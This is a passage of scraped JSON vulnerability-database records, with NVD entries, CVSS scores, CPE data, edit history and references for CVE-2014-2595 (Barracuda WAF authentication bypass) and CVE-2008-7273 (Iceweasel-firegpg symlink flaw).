"756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}, {"hash": "ee2d931efb4c4fa7a1a321df76c0b838", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-21T13:06:26", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 47}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 4, "lastseen": "2020-02-21T13:06:26"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:14:28", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:14:28", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "hash": "d6e72c33ebf3accfe25046812d0b1e7698f2d37c9159defa7c7bda26e2ab359b", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "073d5951cb97bd54baf9ef00e5950ef4", "key": "extraReferences"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "immutableFields": [], "lastseen": "2021-02-02T06:14:28", "modified": "2020-02-20T15:55:00", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 60}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:14:28"}], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13887", "SECURITYVULNS:DOC:31004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127740"]}, {"type": "exploitdb", "idList": ["EDB-ID:39278"]}], "modified": "2021-04-22T23:44:08", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-04-22T23:44:08", "rev": 2}}, "type": "cve", "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a97b191a26cb922c0b82d26c5f04f4db"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "832b9c21b4589969549f63eb0724398c"}, {"key": "cpe23", "hash": "405ecfc0fb244283a2773863614145bf"}, {"key": "cpeConfiguration", "hash": "238f536d7ccbcb60d24ab76ed2548b8b"}, {"key": "cvelist", "hash": "afd8c4a8002c25596504fc1efc107886"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "86870277fcb3e3e121fe9e4f1f7c2b51"}, {"key": "description", "hash": "584cd9e6927eaaa814c6545414f09911"}, {"key": "extraReferences", "hash": "073d5951cb97bd54baf9ef00e5950ef4"}, {"key": "href", "hash": "756bd44ad36e62b951b7a08611cbd3f5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "92ee34fefd5301ff6ccb77b813c8d4f8"}, {"key": "published", "hash": "6c607768196e3786ab17cb3a6e516cad"}, {"key": "references", "hash": "cf46dbeffc0c7dc51130bcd388b4459a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "bc7f8fc71017e1124d57947313af5643"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "scheme": null, "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cwe": ["CWE-613"], "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "immutableFields": []}, {"id": "CVE-2008-7273", "bulletinFamily": "NVD", "title": "CVE-2008-7273", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "published": "2019-11-18T22:15:00", "modified": "2019-11-20T15:56:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "cvelist": ["CVE-2008-7273"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedSoftware": [{"name": "getfiregpg iceweasel-firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:iceweasel-firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-12-18T13:57:06", "references": [], "rev": 2}, "score": {"modified": "2019-12-18T13:57:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "d61e8c253c1f5d35ed5977532afcfe58d323a03057be4323e8c19bd7bed39d26", "hashmap": [{"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3e1e24cf5fed13b85f5534cb239a1044", "key": "cpe"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4464888dd8ea79b7344278e86594f061", "key": "affectedSoftware"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2019-12-18T13:57:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-12-18T13:57:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "557fd4cb813bf4897b5fdca93f953d2fe22dd9fed46f9a924ed2d03719983a4f", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-09-21T13:59:22", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T19:28:28", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T19:28:28", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3f2537e658f4240fe6f7df8e451ce685d2ca8ba79fbda529c1842e690c507e37", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-12-09T19:28:28", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 76}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T19:28:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T11:51:06", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T11:51:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "3f49259ae0555553bcbf3433a53f5984d6de287f6d865e78b449bda3b88b8ea7", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-10-03T11:51:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 72}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-10-03T11:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": 